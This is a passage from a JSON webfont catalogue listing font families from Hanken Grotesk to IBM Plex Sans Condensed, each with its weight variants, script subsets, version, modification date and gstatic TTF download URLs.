\"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcbWFa4fpNzXhRKA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcVGFa4fpNzXhRKA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcM2Fa4fpNzXhRKA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcGmFa4fpNzXhRKA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyWyo_BJ731BKMSK.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyUyovBJ731BKMSK.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyXsovBJ731BKMSK.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyWyovBJ731BKMSK.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyWAovBJ731BKMSK.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyVspfBJ731BKMSK.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyVVpfBJ731BKMSK.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyUypfBJ731BKMSK.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/hankengrotesk/v5/ieVo2YZDLWuGJpnzaiwFXS9tYtpY_d6T_POl0fRJeyUbpfBJ731BKMSK.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hanuman\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/hanuman/v22/VuJzdNvD15HhpJJBQMLdPKNiaRpFvg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/hanuman/v22/VuJ0dNvD15HhpJJBQAr_HIlMZRNcp0o.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hanuman/v22/VuJxdNvD15HhpJJBeKbXOIFneRo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hanuman/v22/VuJ0dNvD15HhpJJBQBr4HIlMZRNcp0o.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/hanuman/v22/VuJ0dNvD15HhpJJBQCL6HIlMZRNcp0o.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Happy Monkey\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/happymonkey/v14/K2F2fZZcl-9SXwl5F_C4R_OABwD2bWqVjw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Harmattan\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/harmattan/v17/goksH6L2DkFvVvRp9XpTS0CjkP1Yog.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/harmattan/v17/gokpH6L2DkFvVvRp9Xpr92-HmNZEq6TTFw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Headland One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/headlandone/v15/yYLu0hHR2vKnp89Tk1TCq3Tx0PlTeZ3mJA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Heebo\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EiS2cckOnz02SXQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1ECSycckOnz02SXQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1E1yycckOnz02SXQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EiSycckOnz02SXQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EuyycckOnz02SXQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EVyucckOnz02SXQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EbiucckOnz02SXQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1ECSucckOnz02SXQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EICucckOnz02SXQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Henny Penny\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hennypenny/v17/wXKvE3UZookzsxz_kjGSfMQqt3M7tMDT.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hepta Slab\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvkV5jfbY5B0NBkz.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvmV5zfbY5B0NBkz.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvlL5zfbY5B0NBkz.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvkV5zfbY5B0NBkz.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvkn5zfbY5B0NBkz.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvnL4DfbY5B0NBkz.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvny4DfbY5B0NBkz.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvmV4DfbY5B0NBkz.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvm84DfbY5B0NBkz.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Herr Von Muellerhoff\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/herrvonmuellerhoff/v15/WBL6rFjRZkREW8WqmCWYLgCkQKXb4CAft3c6_qJY3QPQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hi Melody\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/himelody/v13/46ktlbP8Vnz0pJcqCTbEf29E31BBGA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hina Mincho\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hinamincho/v8/2sDaZGBRhpXa2Jjz5w5LAGW8KbkVZTHR.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hind\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfMJaIRuYjDpf5Vw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hind/v16/5aU69_a8oxmIRG5yBROzkDM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfJpbIRuYjDpf5Vw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfLZcIRuYjDpf5Vw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfNJdIRuYjDpf5Vw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hind Guntur\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_yGn1czn9zaj5Ju.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hindguntur/v12/wXKvE3UZrok56nvamSuJd8Qqt3M7tMDT.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_zenlczn9zaj5Ju.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_zymVczn9zaj5Ju.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_yWmFczn9zaj5Ju.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hind Madurai\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfXaUnecsoMJ0b_g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xx0e2p98ZvDXdZQIOcpqjn8Y0DceA0OQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfBaQnecsoMJ0b_g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfKaMnecsoMJ0b_g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfTaInecsoMJ0b_g.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hind Siliguri\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoRDf44uEfKiGvxts.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwTs5juQtsyLLR5jN4cxBEofJvQxuk0Nig.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoRG_54uEfKiGvxts.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoREP-4uEfKiGvxts.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoRCf_4uEfKiGvxts.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hind Vadodara\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSDn3iXM0oSOL2Yw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/hindvadodara/v12/neINzCKvrIcn5pbuuuriV9tTcJXfrXsfvSo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSGH2iXM0oSOL2Yw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSE3xiXM0oSOL2Yw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSCnwiXM0oSOL2Yw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Holtwood One SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/holtwoodonesc/v16/yYLx0hLR0P-3vMFSk1TCq3Txg5B3cbb6LZttyg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Homemade Apple\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/homemadeapple/v18/Qw3EZQFXECDrI2q789EKQZJob3x9Vnksi4M7.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Homenaje\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/homenaje/v16/FwZY7-Q-xVAi_l-6Ld6A4sijpFu_.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hubballi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hubballi/v4/o-0JIpUj3WIZ1RFN56B7yBBNYuSF.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Hurricane\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/hurricane/v5/pe0sMIuULZxTolZ5YldyAv2-C99ycg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Mono\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6pfjptAgt5VM-kVkqdyU8n3kwq0n1hj-sNFQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6rfjptAgt5VM-kVkqdyU8n1ioStndlre4dFcFh.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6qfjptAgt5VM-kVkqdyU8n3uAL8ldPg-IUDNg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6sfjptAgt5VM-kVkqdyU8n1ioSGlZFh8ARHNh4zg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6qfjptAgt5VM-kVkqdyU8n3oQI8ldPg-IUDNg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6sfjptAgt5VM-kVkqdyU8n1ioSflVFh8ARHNh4zg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F63fjptAgt5VM-kVkqdyU8n5igg1l9kn-s.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6pfjptAgt5VM-kVkqdyU8n1ioq0n1hj-sNFQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6qfjptAgt5VM-kVkqdyU8n3twJ8ldPg-IUDNg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6sfjptAgt5VM-kVkqdyU8n1ioSJlRFh8ARHNh4zg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6qfjptAgt5VM-kVkqdyU8n3vAO8ldPg-IUDNg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6sfjptAgt5VM-kVkqdyU8n1ioSClNFh8ARHNh4zg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6qfjptAgt5VM-kVkqdyU8n3pQP8ldPg-IUDNg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ibmplexmono/v15/-F6sfjptAgt5VM-kVkqdyU8n1ioSblJFh8ARHNh4zg.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX-KVElMYYaJe8bpLHnCwDKjbLeEKxIedbzDw.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX8KVElMYYaJe8bpLHnCwDKhdTmdKZMW9PjD3N8.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjR7_MIZmdd_qFmo.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTm2Idscf3vBmpl8A.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjXr8MIZmdd_qFmo.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTmvIRscf3vBmpl8A.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKtdbUFI5NadY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX-KVElMYYaJe8bpLHnCwDKhdTeEKxIedbzDw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjSL9MIZmdd_qFmo.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTm5IVscf3vBmpl8A.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjQ76MIZmdd_qFmo.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTmyIJscf3vBmpl8A.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjWr7MIZmdd_qFmo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTmrINscf3vBmpl8A.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans Arabic\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3MZRtWPQCuHme67tEYUIx3Kh0PHR9N6YNe3PC5eMlAMg0.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YPy_dCTVsVJKxTs.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YOW_tCTVsVJKxTs.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3CZRtWPQCuHme67tEYUIx3Kh0PHR9N6bs61vSbfdlA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YPO_9CTVsVJKxTs.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YPi-NCTVsVJKxTs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ibmplexsansarabic/v9/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YOG-dCTVsVJKxTs.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"IBM Plex Sans Condensed\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8nN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY7KyKvBgYsMDhM.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8hN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8M_LhakJHhOgBg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY5m6Yvrr4cFFwq5.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8GPqpYMnEhq5H1w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4C6ovrr4cFFwq5.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8AfppYMnEhq5H1w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8lN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHbauwq_jhJsM.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8nN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYasyKvBgYsMDhM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY5a64vrr4cFFwq5.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8F_opYMnEhq5H1w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY527Ivrr4cFFwq5.ttf\",\n        \"600italic\": 